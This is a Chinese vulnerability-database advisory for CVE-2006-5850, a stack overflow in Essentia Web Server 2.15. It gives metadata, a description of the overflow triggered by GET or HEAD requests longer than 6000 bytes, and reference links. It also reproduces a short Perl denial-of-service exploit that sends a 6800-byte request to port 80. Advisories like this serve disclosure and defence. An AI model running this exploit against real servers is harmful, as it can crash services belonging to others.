Essentia Web Server GET及HEAD请求远程栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111468 漏洞类型 缓冲区溢出
发布时间 2006-11-04 更新时间 2006-11-13
CVE编号 CVE-2006-5850 CNNVD-ID CNNVD-200611-169
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2716
https://cxsecurity.com/issue/WLB-2006110049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-169
|漏洞详情
EssentiaWebServer是微软Windows环境下的多线程HTTPServer,由Essen开发、维护。EssentiaWebServer在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。如果攻击者向服务器发送了超长的(超过6000字节)的GET或HEAD请求的话,就会触发栈溢出,导致执行任意代码。
|漏洞EXP
#!/usr/bin/perl


use IO::Socket;

use Getopt::Std; getopts('h:', \%args);



if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL          corryl80@gmail.com ]=-\n";

print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

print "usage: perl " . $0 . " -h HOST\n";

exit();
}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byte\n";

         $data = "GET /$dos \r\n\r\n";

# milw0rm.com [2006-11-04]
|参考资料

来源:XF
名称:essentia-get-bo(30049)
链接:http://xforce.iss.net/xforce/xfdb/30049
来源:BID
名称:20910
链接:http://www.securityfocus.com/bid/20910
来源:MILW0RM
名称:2716
链接:http://www.milw0rm.com/exploits/2716
来源:VUPEN
名称:ADV-2006-4384
链接:http://www.frsirt.com/english/advisories/2006/4384
来源:SECUNIA
名称:22718
链接:http://secunia.com/advisories/22718
来源:FULLDISC
名称:20061104[x0n3-h4ck.org]EssentiaWebServer2.15BufferOverflow
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050537.html
来源:BUGTRAQ
名称:20061112Re:[x0n3-h4ck]EssentiaWebServerv.2.15BufferOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/451382/100/200/threaded
来源:BUGTRAQ
名称:20061110[x0n3-h4ck]EssentiaWebServerv.2.15BufferOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/451115/100/0/threaded
来源:SREASON
名称:1846
链接:http://securityreason.com/securityalert/1846
来源:MILW0RM
名称:2716
链接:http://milw0rm.com/exploits/2716